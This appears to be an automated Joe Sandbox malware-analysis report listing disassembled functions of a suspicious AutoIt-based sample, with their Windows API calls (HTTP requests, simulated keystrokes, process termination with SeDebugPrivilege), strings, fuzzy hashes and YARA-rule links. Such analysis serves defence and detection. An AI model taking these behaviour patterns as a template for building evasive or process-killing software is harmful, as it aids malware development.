Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: adf0a53b42fecd63d393f147c6ec444dc4f96913b27caae5619afd5b0f42338a
Instruction ID: 66984fd28c4664983938e33572e93f0776de820ac3546b7486bfa6c02ad33a76
Opcode Fuzzy Hash: adf0a53b42fecd63d393f147c6ec444dc4f96913b27caae5619afd5b0f42338a
Instruction Fuzzy Hash: 7211A776100108AFCB42EF58DC46DDD3FA9FF05350F5144A5FA489F262D671EE509B91

Function 007D1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 007D1459
OleUninitialize.OLE32(?,00000000), ref: 007D14F8
UnregisterHotKey.USER32(?), ref: 007D16DD
DestroyWindow.USER32(?), ref: 008124B9
FreeLibrary.KERNEL32(?), ref: 0081251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0081254B

Strings

close all, xrefs: 007D1454

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: a9e68a8575705f3f4b7fee42c9fade14a4aa5139b6e37c1b160ea5ac84a14473
Instruction ID: f52b2c8fc4bebbeabd160f72dedf6e817803802ab14116889006790b9f23ae66
Opcode Fuzzy Hash: a9e68a8575705f3f4b7fee42c9fade14a4aa5139b6e37c1b160ea5ac84a14473
Instruction Fuzzy Hash: 76D15531702212DFCB19EF15C899AA9F7A5FF04710F5541AEE44AAB362CB34AC62CF50

Function 00847DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00847FAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00847FC1
GetFileAttributesW.KERNEL32(?), ref: 00847FEB
SetFileAttributesW.KERNEL32(?,00000000), ref: 00848005
SetCurrentDirectoryW.KERNEL32(?), ref: 00848017
SetCurrentDirectoryW.KERNEL32(?), ref: 00848060
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 008480B0

Strings

*.*, xrefs: 00848066

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 9ff5fce177f1b384e25c5d99f93d8f45d1692c5735ae3c46ecab0578d8c79425
Instruction ID: 406c1af13cc95ccc1d0e32dff101df67c0f5b49b9370128f4e4d3f11aec41960
Opcode Fuzzy Hash: 9ff5fce177f1b384e25c5d99f93d8f45d1692c5735ae3c46ecab0578d8c79425
Instruction Fuzzy Hash: 47819E72508249DBCB24EF14C844AAEB3E8FF88714F14496AF885C7250EB39DD49CB92

Function 007D5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 007D5C7A

Part of subcall function 007D5D0A: GetClientRect.USER32(?,?), ref: 007D5D30
Part of subcall function 007D5D0A: GetWindowRect.USER32(?,?), ref: 007D5D71
Part of subcall function 007D5D0A: ScreenToClient.USER32(?,?), ref: 007D5D99

GetDC.USER32 ref: 008146F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00814708
SelectObject.GDI32(00000000,00000000), ref: 00814716
SelectObject.GDI32(00000000,00000000), ref: 0081472B
ReleaseDC.USER32(?,00000000), ref: 00814733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 008147C4

Strings

U, xrefs: 00814693

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: c965a63ec1dedb79af1f309a066553d47bfc6efb6f9bc0f62868e6ba442828e0
Instruction ID: ed44debfab4624ec5da15e16a07d821f1bf9f66ccdc908364f260c779337a6bb
Opcode Fuzzy Hash: c965a63ec1dedb79af1f309a066553d47bfc6efb6f9bc0f62868e6ba442828e0
Instruction Fuzzy Hash: 1C712430500209DFDF218F64C984AFA3BB9FF4A325F14166AED55DA2A6C7348C81DF60

Function 0084359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 008435E4

Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD

LoadStringW.USER32(008A2390,?,00000FFF,?), ref: 0084360A

Strings

Error: , xrefs: 008436EF
"%s" (%d) : ==> %s:%s%s, xrefs: 00843724
"%s" (%d) : ==> %s:, xrefs: 00843742
Line %d (File "%s"):, xrefs: 0084366B
^ ERROR, xrefs: 008436C9

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 11e541ae0655335b4b915770ac295cc08a729e8b9dec42f0d8475a02ec1bdd1d
Instruction ID: b0d9c84f7356dab1d386e83d296c4b7abe017396d676b576dae1d4258c29caca
Opcode Fuzzy Hash: 11e541ae0655335b4b915770ac295cc08a729e8b9dec42f0d8475a02ec1bdd1d
Instruction Fuzzy Hash: CC516E71900219FADF14EBA0DC46EEEBB78FF14340F144126F115B22A1EB791A98DBA1

Function 00868B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 007E9BB2

Part of subcall function 007E912D: GetCursorPos.USER32(?), ref: 007E9141
Part of subcall function 007E912D: ScreenToClient.USER32(00000000,?), ref: 007E915E
Part of subcall function 007E912D: GetAsyncKeyState.USER32(00000001), ref: 007E9183
Part of subcall function 007E912D: GetAsyncKeyState.USER32(00000002), ref: 007E919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00868B6B
ImageList_EndDrag.COMCTL32 ref: 00868B71
ReleaseCapture.USER32 ref: 00868B77
SetWindowTextW.USER32(?,00000000), ref: 00868C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00868C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00868CFF

Strings

@GUI_DRAGFILE, xrefs: 00868C9A
@GUI_DROPID, xrefs: 00868C51

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 486bf7aff9d21cb0bcb7c0ec83eff5e0522208ed444f1a3a744083b6fcb92084
Instruction ID: b73712b53d9de8372d7bc9de1fd14b2517419ded2152fac07833b53d253e5b87
Opcode Fuzzy Hash: 486bf7aff9d21cb0bcb7c0ec83eff5e0522208ed444f1a3a744083b6fcb92084
Instruction Fuzzy Hash: 23517C71205304AFEB04DF24DC5AFAA77E4FB89714F44062DFA96972A1CB749904CB62

Function 0084C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0084C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0084C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0084C2CA
GetLastError.KERNEL32 ref: 0084C322
SetEvent.KERNEL32(?), ref: 0084C336
InternetCloseHandle.WININET(00000000), ref: 0084C341

Strings

, xrefs: 0084C2BB

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 0621b2468864e4ae664507b7ade2128c2d89725ff33de89b8ed3fee982860f24
Instruction ID: f6bfe9dc8430199a650e328e19f36b84f0a4957e989cab9524f3fcaeb30c83f7
Opcode Fuzzy Hash: 0621b2468864e4ae664507b7ade2128c2d89725ff33de89b8ed3fee982860f24
Instruction Fuzzy Hash: 03316BB160160CAFD7619FA98888ABB7AFCFB49744B14851EF486D2210DBB4DD049B61

Function 0083989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00813AAF,?,?,Bad directive syntax error,0086CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 008398BC
LoadStringW.USER32(00000000,?,00813AAF,?), ref: 008398C3

Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00839987

Strings

., xrefs: 0083996D
%s (%d) : ==> %s.: %s %s, xrefs: 008398F1
Line %d (File "%s"):, xrefs: 0083992D
Error: , xrefs: 00839955
Line %d:, xrefs: 00839912

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 4ae86418160f196094b38e36d4b72b872a747310311a18df7534f8db75ec462a
Instruction ID: 73ff58a6c0b6ed6278f01be205cd327da3739f97f589c8413ea14fdf9ccae2a9
Opcode Fuzzy Hash: 4ae86418160f196094b38e36d4b72b872a747310311a18df7534f8db75ec462a
Instruction Fuzzy Hash: 0521943190021EEBDF11AF90CC0AEEE7779FF18704F044456F519A51A1EB799628DB51

Function 0083209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 008320AB
GetClassNameW.USER32(00000000,?,00000100), ref: 008320C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0083214D

Strings

details, xrefs: 008320FB
largeicons, xrefs: 008320E1
SHELLDLL_DefView, xrefs: 008320CC
smallicons, xrefs: 00832115
list, xrefs: 0083212F

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: aad39cdda1894d3db0c3ecf14bc7ce96a8fd941f39e03b8354cda15b5658b01a
Instruction ID: df9e6d32b60dc5e02295705b3996f83b9d58ffc66df2799da4e551cd88f3e8ca
Opcode Fuzzy Hash: aad39cdda1894d3db0c3ecf14bc7ce96a8fd941f39e03b8354cda15b5658b01a
Instruction Fuzzy Hash: AD110A7668870AFAFA017224DC0ADBB379CFB54724F204156F704F51D1FBA978015654

Function 00808D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4675fee76bb8fae953eacf3ad33a0c6640f561a32047cac8c4c72987e42759b7
Instruction ID: 1f2837fa008e8cce2bd2b385b8a3db377d692e08726e09e78b10c9c1ac43c489
Opcode Fuzzy Hash: 4675fee76bb8fae953eacf3ad33a0c6640f561a32047cac8c4c72987e42759b7
Instruction Fuzzy Hash: E7C1DEB4A04249EFDB619FA8CC45BADBBB0FF0A310F144199E994E73D2CB749941CB61

Function 0080CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0080CEB7
_free.LIBCMT ref: 0080CF22
_free.LIBCMT ref: 0080CF48
_free.LIBCMT ref: 0080CF71
_free.LIBCMT ref: 0080CFA9
_free.LIBCMT ref: 0080CFDA
_free.LIBCMT ref: 0080D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0080D09C
_free.LIBCMT ref: 0080D0B5

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 31af1537daa126baff76a45cf28dab648343759165fd19290dfaae50204d904c
Instruction ID: fecc9e057db9d6615eb0dfb8ac7ed389a1e26730fe83f2086b3e2e7833990468
Opcode Fuzzy Hash: 31af1537daa126baff76a45cf28dab648343759165fd19290dfaae50204d904c
Instruction Fuzzy Hash: 9D614772A04306AFDBA1AFB89C85A6D7BA5FF02320F14426DF944D72C2DBB19D018752

Function 007E8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00826890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 008268A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008268B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 008268D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008268F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,007E8874,00000000,00000000,00000000,000000FF,00000000), ref: 00826901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0082691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,007E8874,00000000,00000000,00000000,000000FF,00000000), ref: 0082692D

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: e6a316dff5ec72858c45d7a823889459c962b978412d91c034a0e367a26ff2a4
Instruction ID: eb2ea188d294101999f445abadce5a54f153c38417463cda79c661a066913d03
Opcode Fuzzy Hash: e6a316dff5ec72858c45d7a823889459c962b978412d91c034a0e367a26ff2a4
Instruction Fuzzy Hash: FF519AB0600249EFDB20CF29DC55FAA7BB5FB48350F104528F956D72A0EBB4E990DB40

Function 0084C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0084C182
GetLastError.KERNEL32 ref: 0084C195
SetEvent.KERNEL32(?), ref: 0084C1A9

Part of subcall function 0084C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0084C272
Part of subcall function 0084C253: GetLastError.KERNEL32 ref: 0084C322
Part of subcall function 0084C253: SetEvent.KERNEL32(?), ref: 0084C336
Part of subcall function 0084C253: InternetCloseHandle.WININET(00000000), ref: 0084C341

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 75de4445b8b5bf20d59f39cbb57021e6e326aab50c0207004565157a32493f1a
Instruction ID: 41b109a588753690404ae78a513322b1fdc149cd0907ec95e0cddd4d585be3c5
Opcode Fuzzy Hash: 75de4445b8b5bf20d59f39cbb57021e6e326aab50c0207004565157a32493f1a
Instruction Fuzzy Hash: 97318F71602649AFDB619FB5DD44A76BBFDFF18300B00442EF996C2620DBB1E8149B60

Function 008325A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00833A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00833A57
Part of subcall function 00833A3D: GetCurrentThreadId.KERNEL32 ref: 00833A5E
Part of subcall function 00833A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008325B3), ref: 00833A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 008325BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008325DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 008325DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 008325E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00832601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00832605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0083260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00832623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00832627

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: a4b008691c376bad15793c5382c0ccc9bf80e001016108844cf1b025860233eb
Instruction ID: cde2a2a633c31cb34655938ad20435f07b4c0e481999eedf88faced651d6f56e
Opcode Fuzzy Hash: a4b008691c376bad15793c5382c0ccc9bf80e001016108844cf1b025860233eb
Instruction Fuzzy Hash: 6F01D830390624BBFB107768DC8AF693F59FF9EB11F111005F354EE0D1C9E124448AAA

Function 00831803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00831449,?,?,00000000), ref: 0083180C
HeapAlloc.KERNEL32(00000000,?,00831449,?,?,00000000), ref: 00831813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00831449,?,?,00000000), ref: 00831828
GetCurrentProcess.KERNEL32(?,00000000,?,00831449,?,?,00000000), ref: 00831830
DuplicateHandle.KERNEL32(00000000,?,00831449,?,?,00000000), ref: 00831833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00831449,?,?,00000000), ref: 00831843
GetCurrentProcess.KERNEL32(00831449,00000000,?,00831449,?,?,00000000), ref: 0083184B
DuplicateHandle.KERNEL32(00000000,?,00831449,?,?,00000000), ref: 0083184E
CreateThread.KERNEL32(00000000,00000000,00831874,00000000,00000000,00000000), ref: 00831868

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 1e922e2c32b2615c1fb18d1ff600451bce142478eefe272177689819de236dc1
Instruction ID: 2e43a244d80bebe053aaaad723e4c2caaa093399c7cfc34fc813b6410cbd0df0
Opcode Fuzzy Hash: 1e922e2c32b2615c1fb18d1ff600451bce142478eefe272177689819de236dc1
Instruction Fuzzy Hash: 1201BBB5240348BFE710ABA5DC4DF6B7BACFB8AB11F015411FA45DB2A1CAB59800CB70

Function 0085A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0083D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0083D501
Part of subcall function 0083D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0083D50F
Part of subcall function 0083D4DC: CloseHandle.KERNEL32(00000000), ref: 0083D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0085A16D
GetLastError.KERNEL32 ref: 0085A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0085A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0085A268
GetLastError.KERNEL32(00000000), ref: 0085A273
CloseHandle.KERNEL32(00000000), ref: 0085A2C4

Strings

SeDebugPrivilege, xrefs: 0085A18F

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
